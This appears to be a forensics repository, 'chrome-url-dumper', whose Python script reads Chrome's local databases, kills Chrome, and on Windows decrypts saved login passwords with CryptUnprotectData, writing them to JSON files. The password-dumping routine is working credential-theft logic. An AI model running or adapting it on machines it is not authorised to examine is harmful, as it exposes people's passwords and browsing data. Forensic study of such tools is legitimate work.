├── .gitignore
├── README.md
├── chrome_data_frame.txt
├── main.py
└── requirements.txt


/.gitignore:
--------------------------------------------------------------------------------
  1 | # Byte-compiled / optimized / DLL files
  2 | __pycache__/
  3 | *.py[cod]
  4 | *$py.class
  5 | 
  6 | # C extensions
  7 | *.so
  8 | 
  9 | # Distribution / packaging
 10 | .Python
 11 | build/
 12 | develop-eggs/
 13 | dist/
 14 | downloads/
 15 | eggs/
 16 | .eggs/
 17 | lib/
 18 | lib64/
 19 | parts/
 20 | sdist/
 21 | var/
 22 | wheels/
 23 | *.egg-info/
 24 | .installed.cfg
 25 | *.egg
 26 | 
 27 | # PyInstaller
 28 | #  Usually these files are written by a python script from a template
 29 | #  before PyInstaller builds the exe, so as to inject date/other infos into it.
 30 | *.manifest
 31 | *.spec
 32 | 
 33 | # Installer logs
 34 | pip-log.txt
 35 | pip-delete-this-directory.txt
 36 | 
 37 | # Unit test / coverage reports
 38 | htmlcov/
 39 | .tox/
 40 | .coverage
 41 | .coverage.*
 42 | .cache
 43 | nosetests.xml
 44 | coverage.xml
 45 | *.cover
 46 | .hypothesis/
 47 | 
 48 | # Translations
 49 | *.mo
 50 | *.pot
 51 | 
 52 | # Django stuff:
 53 | *.log
 54 | local_settings.py
 55 | 
 56 | # Flask stuff:
 57 | instance/
 58 | .webassets-cache
 59 | 
 60 | # Scrapy stuff:
 61 | .scrapy
 62 | 
 63 | # Sphinx documentation
 64 | docs/_build/
 65 | 
 66 | # PyBuilder
 67 | target/
 68 | 
 69 | # Jupyter Notebook
 70 | .ipynb_checkpoints
 71 | 
 72 | # pyenv
 73 | .python-version
 74 | 
 75 | # celery beat schedule file
 76 | celerybeat-schedule
 77 | 
 78 | # SageMath parsed files
 79 | *.sage.py
 80 | 
 81 | # Environments
 82 | .env
 83 | .venv
 84 | env/
 85 | venv/
 86 | ENV/
 87 | 
 88 | # Spyder project settings
 89 | .spyderproject
 90 | .spyproject
 91 | 
 92 | # Rope project settings
 93 | .ropeproject
 94 | 
 95 | # mkdocs documentation
 96 | /site
 97 | 
 98 | # mypy
 99 | .mypy_cache/
100 | 
101 | # User-specific stuff:
102 | .idea/
103 | .idea/**/workspace.xml
104 | .idea/**/tasks.xml
105 | .idea/dictionaries
106 | 
107 | # Sensitive or high-churn files:
108 | .idea/**/dataSources/
109 | .idea/**/dataSources.ids
110 | .idea/**/dataSources.xml
111 | .idea/**/dataSources.local.xml
112 | .idea/**/sqlDataSources.xml
113 | .idea/**/dynamic.xml
114 | .idea/**/uiDesigner.xml
115 | 
116 | # Gradle:
117 | .idea/**/gradle.xml
118 | .idea/**/libraries
119 | 
120 | # CMake
121 | cmake-build-debug/
122 | 
123 | # Mongo Explorer plugin:
124 | .idea/**/mongoSettings.xml
125 | 
126 | ## File-based project format:
127 | *.iws
128 | 
129 | ## Plugin-specific files:
130 | 
131 | # IntelliJ
132 | /out/
133 | 
134 | # mpeltonen/sbt-idea plugin
135 | .idea_modules/
136 | 
137 | # JIRA plugin
138 | atlassian-ide-plugin.xml
139 | 
140 | # Cursive Clojure plugin
141 | .idea/replstate.xml
142 | 
143 | # Crashlytics plugin (for Android Studio and IntelliJ)
144 | com_crashlytics_export_strings.xml
145 | crashlytics.properties
146 | crashlytics-build.properties
147 | fabric.properties


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # chrome-url-dumper
 2 | 
 3 | [![Awesome](https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78fa85652e3a63e154dd8e8829/media/badge.svg)](https://github.com/cugu/awesome-forensics)
 4 | 
 5 | Accessing db's stored on machine by chrome browser and dumping urls found 
 6 | 
 7 | ## Getting Started
 8 | 
 9 | These instructions will get you a copy of the project up and running on your local machine for development and testing purposes. See Running the tests for notes on how to deploy the project on a live system.
10 | 
11 | ### Prerequisites
12 | 
13 | ```
14 | Python 2.7
15 | ```
16 | 
17 | ### Installing
18 | 
19 | ```
20 | pip install -r requirements.txt
21 | ```
22 | 
23 | Check packages
24 | 
25 | 
26 | Windows
27 | ```
28 | pip list | Findstr /L "package"
29 | ```
30 | 
31 | Linux
32 | ```
33 | pip list | grep "package"
34 | ```
35 | 
36 | ## Running the tests
37 | 
38 | -k kill chrome proccess ( deeper analysis )
39 | -d deeper analysis
40 | 
41 | Windows
42 | ```
43 | python main.py -k -d
44 | ```
45 | 
46 | Linux
47 | ```
48 | ./main.py -k -d
49 | ```
50 | 
51 | ## Authors
52 | 
53 | * **Tomer Eyzenberg** - *Initial work* - [eLoopWoo](https://github.com/eLoopWoo)
54 | 
55 | 


--------------------------------------------------------------------------------
/chrome_data_frame.txt:
--------------------------------------------------------------------------------
 1 | ('History,meta):['value', 'key']
 2 | ('History,visits):['visit_time', 'from_visit', 'segment_id', 'url', 'transition', 'visit_duration', 'id']
 3 | ('History,visit_source):['source', 'id']
 4 | ('History,keyword_search_terms):['keyword_id', 'term', 'url_id', 'lower_term']
 5 | ('History,downloads):['tab_url', 'http_method', 'total_bytes', 'interrupt_reason', 'guid', 'id', 'opened', 'site_url', 'state', 'etag', 'received_bytes', 'mime_type', 'hash', 'last_access_time', 'by_ext_id', 'start_time', 'tab_referrer_url', 'last_modified', 'by_ext_name', 'danger_type', 'original_mime_type', 'referrer', 'current_path', 'target_path', 'transient', 'end_time']
 6 | ('History,downloads_url_chains):['url', 'chain_index', 'id']
 7 | ('History,segments):['url_id', 'id', 'name']
 8 | ('History,segment_usage):['visit_count', 'time_slot', 'id', 'segment_id']
 9 | ('History,downloads_slices):['download_id', 'received_bytes', 'offset']
10 | ('History,typed_url_sync_metadata):['storage_key', 'value']
11 | ('History,urls):['typed_count', 'title', 'url', 'hidden', 'last_visit_time', 'visit_count', 'id']
12 | ('History,sqlite_sequence):['name', 'seq']
13 | 
14 | ('Favicons,meta):['value', 'key']
15 | ('Favicons,icon_mapping):['icon_id', 'id', 'page_url']
16 | ('Favicons,favicons):['url', 'id', 'icon_type']
17 | ('Favicons,favicon_bitmaps):['last_updated', 'last_requested', 'icon_id', 'height', 'width', 'image_data', 'id']
18 | 
19 | ('Top Sites,meta):['value', 'key']
20 | ('Top Sites,thumbnails):['redirects', 'last_updated', 'title', 'url', 'url_rank', 'good_clipping', 'boring_score', 'last_forced', 'at_top', 'load_completed', 'thumbnail']
21 | 
22 | ('Web Data,meta):['value', 'key']
23 | ('Web Data,autofill):['count', 'date_last_used', 'name', 'value_lower', 'value', 'date_created']
24 | ('Web Data,credit_cards):['name_on_card', 'origin', 'expiration_year', 'date_modified', 'card_number_encrypted', 'use_count', 'expiration_month', 'use_date', 'guid', 'billing_address_id']
25 | ('Web Data,autofill_profiles):['origin', 'city', 'date_modified', 'zipcode', 'use_count', 'state', 'company_name', 'country_code', 'language_code', 'use_date', 'dependent_locality', 'guid', 'sorting_code', 'street_address']
26 | ('Web Data,autofill_profile_names):['last_name', 'first_name', 'guid', 'middle_name', 'full_name']
27 | ('Web Data,autofill_profile_emails):['guid', 'email']
28 | ('Web Data,autofill_profile_phones):['guid', 'number']
29 | ('Web Data,autofill_profiles_trash):['guid']
30 | ('Web Data,unmasked_credit_cards):['use_count', 'use_date', 'card_number_encrypted', 'id', 'unmask_date']
31 | ('Web Data,server_card_metadata):['use_count', 'use_date', 'id', 'billing_address_id']
32 | ('Web Data,server_addresses):['phone_number', 'country_code', 'language_code', 'recipient_name', 'address_4', 'postal_code', 'address_1', 'address_2', 'address_3', 'sorting_code', 'id', 'street_address', 'company_name']
33 | ('Web Data,server_address_metadata):['use_count', 'use_date', 'id', 'has_converted']
34 | ('Web Data,ie7_logins):['date_created', 'url_hash', 'password_value']
35 | ('Web Data,token_service):['encrypted_token', 'service']
36 | ('Web Data,keywords):['instant_url', 'search_terms_replacement_key', 'created_by_policy', 'prepopulate_id', 'id', 'image_url_post_params', 'input_encodings', 'sync_guid', 'new_tab_url', 'usage_count', 'instant_url_post_params', 'originating_url', 'alternate_urls', 'short_name', 'safe_for_autoreplace', 'last_modified', 'suggest_url', 'keyword', 'favicon_url', 'url', 'last_visited', 'suggest_url_post_params', 'image_url', 'date_created', 'search_url_post_params']
37 | ('Web Data,autofill_sync_metadata):['storage_key', 'value']
38 | ('Web Data,autofill_model_type_state):['id', 'value']
39 | ('Web Data,masked_credit_cards):['status', 'name_on_card', 'exp_month', 'last_four', 'exp_year', 'type', 'id']
40 | 
41 | ('Shortcuts,omni_box_shortcuts):['description', 'keyword', 'last_access_time', 'url', 'text', 'number_of_hits', 'transition', 'id', 'fill_into_edit', 'description_class', 'type', 'contents_class', 'contents']
42 | ('Shortcuts,meta):['value', 'key']
43 | 
44 | ('Login Data,meta):['value', 'key']
45 | ('Login Data,stats):['username_value', 'dismissal_count', 'update_time', 'origin_domain']
46 | ('Login Data,logins):['username_value', 'action_url', 'username_element', 'submit_element', 'display_name', 'icon_url', 'federation_url', 'password_type', 'generation_upload_status', 'blacklisted_by_user', 'times_used', 'preferred', 'skip_zero_click', 'signon_realm', 'scheme', 'possible_username_pairs', 'origin_url', 'password_element', 'password_value', 'form_data', 'date_created', 'date_synced']
47 | 
48 | ('Origin Bound Certs,meta):['value', 'key']
49 | ('Origin Bound Certs,channel_id):['public_key', 'host', 'creation_time', 'private_key']
50 | 
51 | ('QuotaManager,meta):['value', 'key']
52 | ('QuotaManager,HostQuotaTable):['host', 'type', 'quota']
53 | ('QuotaManager,OriginInfoTable):['origin', 'last_modified_time', 'type', 'used_count', 'last_access_time']
54 | ('QuotaManager,EvictionInfoTable):['origin', 'type', 'last_eviction_time']
55 | 


--------------------------------------------------------------------------------
/main.py:
--------------------------------------------------------------------------------
  1 | import sqlite3
  2 | import argparse
  3 | import os
  4 | 
  5 | import errno
  6 | from pandas import read_sql_query
  7 | from re import findall
  8 | import psutil
  9 | from difflib import SequenceMatcher
 10 | import json
 11 | import platform
 12 | import time
 13 | import logging
 14 | import sys
 15 | 
 16 | log = logging.getLogger(__name__)
 17 | out_hdlr = logging.StreamHandler(sys.stdout)
 18 | out_hdlr.setFormatter(logging.Formatter('%(asctime)s %(message)s'))
 19 | out_hdlr.setLevel(logging.INFO)
 20 | log.addHandler(out_hdlr)
 21 | log.setLevel(logging.INFO)
 22 | 
 23 | 
 24 | def investigate_dbs(terminate_chrome, deep):
 25 |     log.info('INVESTIGATE CHROME DBS')
 26 |     current_time = time.strftime("%H-%M-%S_%d-%m-%Y")
 27 |     if not os.path.exists(current_time):
 28 |         try:
 29 |             log.info('CREATING FOLDER: {}'.format(os.path.join(os.getcwd(), current_time)))
 30 |             os.makedirs(current_time)
 31 |         except OSError as exc:
 32 |             if exc.errno != errno.EEXIST:
 33 |                 raise
 34 |     if terminate_chrome:
 35 |         log.info('TERMINATE CHROME')
 36 |         kill_process()
 37 |     chrome_dbs_path = get_dbs_path()
 38 |     log.info('DUMP DOWNLOADS')
 39 |     dump_downloads(path=chrome_dbs_path, output=os.path.join(current_time, 'chrome_downloads.json'))
 40 |     if 'C:\\' in chrome_dbs_path:
 41 |         log.info('DUMP USER PASS')
 42 |         dump_user_pass(path=chrome_dbs_path, output=os.path.join(current_time, 'chrome_user_pass.json'))
 43 |     log.info('DUMP USERS')
 44 |     dump_users(path=chrome_dbs_path, output=os.path.join(current_time, 'chrome_users.json'))
 45 | 
 46 |     if deep:
 47 |         log.info('GENERATE CHROME FILES')
 48 |         chrome_files = generate_all_files(path=chrome_dbs_path)
 49 |         log.info('GENERATE URLS - DEEP')
 50 |         urls = generate_urls(path=chrome_dbs_path, files=chrome_files)
 51 |     else:
 52 |         chrome_db_files = ['History', 'Favicons', 'Cookies', 'Top Sites',
 53 |                            'Visited Links', 'Web Data', 'Shortcuts', 'Last Session',
 54 |                            'Last Tabs', 'Network Action Predictor', 'Current Tabs',
 55 |                            'Preferences', 'Current Session', 'TransportSecurity',
 56 |                            'TransportSecurity', 'Login Data', 'Origin Bound Certs',
 57 |                            'Bookmarks', 'QuotaManager', 'Extension Cookies']
 58 |         log.info('GENERATE URLS - NORMAL')
 59 |         urls = generate_urls(path=chrome_dbs_path, files=chrome_db_files)
 60 | 
 61 |     log.info('DUMP URLS')
 62 |     dump_urls(urls=urls, output=os.path.join(current_time, 'chrome_urls.json'))
 63 | 
 64 | 
 65 | def generate_all_files(path):
 66 |     chrome_files = set([])
 67 |     for root, dirs, files in os.walk(path):
 68 |         chrome_files = chrome_files.union(files)
 69 |     return chrome_files
 70 | 
 71 | 
 72 | def dump_user_pass(path, output):
 73 |     with open(output, 'w') as f:
 74 |         data = ([], [])
 75 |         conn = sqlite3.connect(os.path.join(path, 'Login Data'))
 76 |         cursor = conn.cursor()
 77 |         cursor.execute(
 78 |             'SELECT username_value, action_url, times_used, signon_realm, origin_url, password_element, password_value, date_created FROM logins')
 79 |         for result in cursor.fetchall():
 80 |             import win32crypt
 81 |             password = win32crypt.CryptUnprotectData(result[6], None, None, None, 0)[1]
 82 |             if password:
 83 |                 result = list(result)
 84 |                 result.pop(6)
 85 |                 result.insert(6, password)
 86 |                 data[0].append(result)
 87 |             else:
 88 |                 result = list(result)
 89 |                 result.pop(6)
 90 |                 data[1].append(result)
 91 |         f.write(json.dumps(data))
 92 |         f.flush()
 93 | 
 94 | 
 95 | def dump_users(path, output):
 96 |     with open(output, 'w') as f:
 97 |         conn = sqlite3.connect(os.path.join(path, 'Login Data'))
 98 |         cursor = conn.cursor()
 99 |         cursor.execute(
100 |             'SELECT username_value, update_time, origin_domain FROM stats')
101 |         data = cursor.fetchall()
102 |         f.write(json.dumps(data))
103 |         f.flush()
104 | 
105 | 
106 | def dump_downloads(path, output):
107 |     with open(output, 'w') as f:
108 |         db_path = os.path.join(path, 'History')
109 |         conn = sqlite3.connect(db_path)
110 |         cursor = conn.cursor()
111 |         cursor.execute(
112 |             'SELECT tab_url, http_method, opened, site_url, last_access_time, start_time, tab_referrer_url, last_modified, by_ext_name, original_mime_type, referrer, current_path, target_path, transient FROM downloads')
113 |         data = cursor.fetchall()
114 |         f.write(json.dumps(data))
115 |         f.flush()
116 | 
117 | 
118 | def dump_urls(urls, output):
119 |     with open(output, 'w') as f:
120 |         for url in urls:
121 |             f.write('{}\n'.format(url))
122 | 
123 | 
124 | def fuzzy_search(name1, name2, strictness):
125 |     similarity = SequenceMatcher(None, name1, name2)
126 |     return similarity.ratio() > strictness
127 | 
128 | 
129 | def kill_process():
130 |     process_names = ['chrome.exe', 'chrome']
131 |     for p in psutil.process_iter():
132 |         for p_name in process_names:
133 |             try:
134 |                 if p.name() == p_name:
135 |                     p.kill()
136 |             except psutil.NoSuchProcess:
137 |                 # unknown problem
138 |                 log.info("PSUUTIL.NOSUCHPROCESS")
139 |                 continue
140 | 
141 | 
142 | def get_dbs_path():
143 |     path_win_10_post2008 = os.path.join('C:\\', 'Users', os.getenv('username'), 'AppData', 'Local', 'Google', 'Chrome', 'User Data', 'Default')
144 |     path_win_7 = os.path.join('C:\\', 'Users', os.getenv('username'), 'AppData', 'Local', 'Google', 'Chrome', 'User Data', 'Default')
145 |     path_win_xp = os.path.join('C:\\', 'Documents and Settings', os.getenv('username'), 'Application Support', 'Google', 'Chrome', 'Default')
146 |     path_mac_os_x = os.path.join('/home', os.getenv('USER'), 'Library', 'Application Support', 'Google', 'Chrome', 'Default')
147 |     path_linux = os.path.join('/home', os.getenv('USER'), '.config', 'google-chrome', 'Default')
148 |     system_name = platform.system().upper()
149 |     if 'JAVA' in system_name:
150 |         return None
151 |     if 'WINDOWS' in system_name:
152 |         system_name += platform.release().upper()
153 |     return {
154 |         'WINDOWSPOST2008SERVER': path_win_10_post2008,
155 |         'WINDOWS10': path_win_10_post2008,
156 |         'WINDOWS8.1': path_win_10_post2008,
157 |         'WINDOWS8': path_win_10_post2008,
158 |         'WINDOWS7': path_win_7,
159 |         'WINDOWSVISTA': path_win_7,
160 |         'WINDOWSXP': path_win_xp,
161 |         'MACOS': path_mac_os_x,
162 |         'LINUX': path_linux
163 |     }.get(system_name, 'WINDOWS10')
164 | 
165 | 
166 | def generate_urls(path, files):
167 |     urls = set([])
168 |     counter = 0
169 |     for f in files:
170 |         try:
171 |             counter += 1
172 |             if not (counter % (len(files) / 10)):
173 |                 log.info("GENERATE URLS: {}%".format((float(counter) / len(files)) * 100))
174 |             db = sqlite3.connect(os.path.join(path, f))
175 |             cursor = db.cursor()
176 |             cursor.execute("SELECT name FROM sqlite_master WHERE type='table';")
177 |             tables = cursor.fetchall()
178 |             for table_name in tables:
179 |                 table_name = table_name[0]
180 |                 table = read_sql_query("SELECT * from %s" % table_name, db)
181 |                 new_urls = findall(r"(https?:\/\/)?([\da-z\.-]+)\.([a-z\.]{2,6})([\S]*)\/?", table.to_string())
182 |                 urls = urls.union(new_urls)
183 |                 # log.info('File:{:15}Success'.format(f))
184 |         except sqlite3.DatabaseError, e:
185 |             log.info('GENERATE URLS: {:30}File: {:30}Failed: {:30}'.format(str((float(counter) / len(files)) * 100) + '%', f, e))
186 |             # log.info("GENERATE URLS: {}%".format(100.0))
187 |     return urls
188 | 
189 | 
190 | if __name__ == '__main__':
191 |     parser = argparse.ArgumentParser(description='Dump information from Google-Chrome browser databases')
192 |     parser.add_argument('-k', '--kill-browser', help='terminate chrome process', required=False,
193 |                         dest='terminate_chrome',
194 |                         action='store_true')
195 |     parser.add_argument('-d', '--deep', help='deep inspection', required=False, dest='deep',
196 |                         action='store_true')
197 | 
198 |     investigate_dbs(**vars(parser.parse_args()))
199 | 


--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
1 | pandas==0.19.2
2 | psutil==5.2.2
3 | pypiwin32==219
4 | 


--------------------------------------------------------------------------------